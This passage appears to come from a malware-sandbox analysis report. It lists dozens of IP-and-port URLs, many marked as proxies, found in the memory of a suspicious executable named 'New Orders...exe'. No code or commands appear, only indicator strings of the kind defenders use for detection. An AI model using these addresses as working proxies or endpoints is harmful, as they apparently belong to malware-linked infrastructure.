                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.93.171:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.188.93.171:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.71.247.130:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.71.247.130:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://68.71.254.6:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2518E000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.225:8181
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.160.223.225:8181://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.167.169.46:12903
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.167.169.46:129038
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.167.169.46:12903://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.104:36181
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.61.200.104:36181://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.157:8080
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://69.75.140.157:8080://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.126.33.226:47370
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.126.33.226:47370://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.166.167.55:57745
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://70.166.167.55:57745://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:26887
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:26887://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:29585
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:29585://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:31571
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:31571://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2660F000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5321
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5321://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5385
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5385://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.170:5385p
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:26315
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD254E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:26315://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:5369
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.171:5369://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.172:1087
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.172:1087://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:10677
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.173:10677://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:22669
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.174:22669://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.9
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:17893
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:17893://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:21011
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28AAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:21011://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:23685
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:23685://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:24397
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:24397://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29129
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29129://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29197
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29197://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29813
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29813://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29ADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29919
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29919://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29967
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:29967://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:3051
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:3051://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD251F6000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:30951
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.90:30951://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:5123
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:5123://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:5775
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.92:5775://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.93:13477
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.93:13477://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.94:4595
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.160.94:4595://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.1
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10801
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:10801://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28665000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:11251
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:11251://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13341
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13341://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13477
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:13477://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1403
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1403://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25760000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1431
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD256D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1431://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:18067
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:18067://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD257C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:18067p
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1929
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:1929://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2675
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:2675://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30717
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30717://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30911
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:30911://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5529
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5529://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5931
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5931://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5935
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.10.164.178:5935://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.157:64742
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD274EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.221.157:64742://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD25D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.113:4125
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2518E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.113:48892
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2518E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.222.113:48892://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:15410
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:15410://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:19802
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.167.38.7:19802://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.169:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD2610C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.114.169:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.35:27360
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.35:27360://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.41:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.41:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.58:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.58:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.59:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.59:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.6
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD266F1000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.60:27391
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD26236000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.195.34.60:27391://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.105:64935
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.105:64935://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29852000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.97:64943
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD297FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.206.181.97:64943://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.197:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.197:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.221.223:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.134:46164
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD29AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.134:46164://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD267CB000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD27737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.210.252.137:4145://proxy8
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.252.4.49:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.252.4.49:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmp, New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28D9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD252EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.37.217.3:4145://proxy
                  Source: New Orders#U034fx#U034fl#U034fx#U034f..exe, 00000000.00000002.2787213827.000002AD28DB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.49.49.11:31034
